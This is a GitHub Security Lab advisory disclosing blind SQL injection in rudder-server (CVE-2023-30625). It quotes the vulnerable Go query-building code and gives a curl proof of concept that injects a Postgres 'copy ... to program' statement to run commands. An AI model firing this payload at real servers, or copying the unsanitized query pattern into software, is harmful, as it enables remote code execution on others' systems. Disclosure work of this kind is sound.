GHSL-2022-097: SQL injection in rudderlabs/rudder-server - CVE-2023-30625

Coordinated Disclosure Timeline

• 2022-10-31: Report sent to developers
• 2022-10-31: Vulnerability acknowledged
• 2022-11-21: Vulnerable code fixed

Summary

Blind SQL injections are present in rudder-server that allows unauthenticated users to achieve Remote Code Execution.

Product

rudder-server

Tested Version

v1.2.5

Details

Issue 1: Blind SQL injection in warehouse/warehouse.go (GHSL-2022-097)

Endpoint: v1/warehouse/pending-events

sqlStatement = fmt.Sprintf(`SELECT COUNT(*)
                                FROM %[1]s
								WHERE %[1]s.id > %[2]v AND %[1]s.%[4]s='%[3]s'`,
		warehouseutils.WarehouseStagingFilesTable, lastStagingFileID, sourceOrDestId, sourceOrDestColumn)

The source_id string is passed from user input, renamed into sourceorDestId, then formatted into a query without previous sanitization.

This issue was found by the Database query built from user-controlled sources CodeQL query.

Issue 2 (Potential): Blind SQL injection in router/failed-events-manager.go

Endpoint: v1/failed-events

table := fmt.Sprintf(`%s_%s`, failedKeysTablePrefix, taskRunID)
	sqlStatement := fmt.Sprintf(`SELECT %[1]s.destination_id, %[1]s.record_id
                                             FROM %[1]s `, table)
	rows, err = fem.dbHandle.Query(sqlStatement)

The source_id string is passed from user input, renamed into taskRunID, then formatted as part of the table name without previous sanitization.

This issue was found by the Database query built from user-controlled sources CodeQL query.

Impact

This issue may lead to Remote Code Execution (RCE) due to the rudder role in PostgresSQL having superuser permissions by default.

Resources

This proof of concept allows attackers to run arbitrary commands as the postgres user.

curl -v -u "key": -X POST http://localhost:8080/v1/warehouse/pending-events -d "{\"source_id\": \"test'; copy (SELECT '') to program 'arbitrary_command_here'-- - \"}" --header "Content-Type: application/json"

CVE

• CVE-2023-30625

Credit

This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-097 in any communication regarding this issue.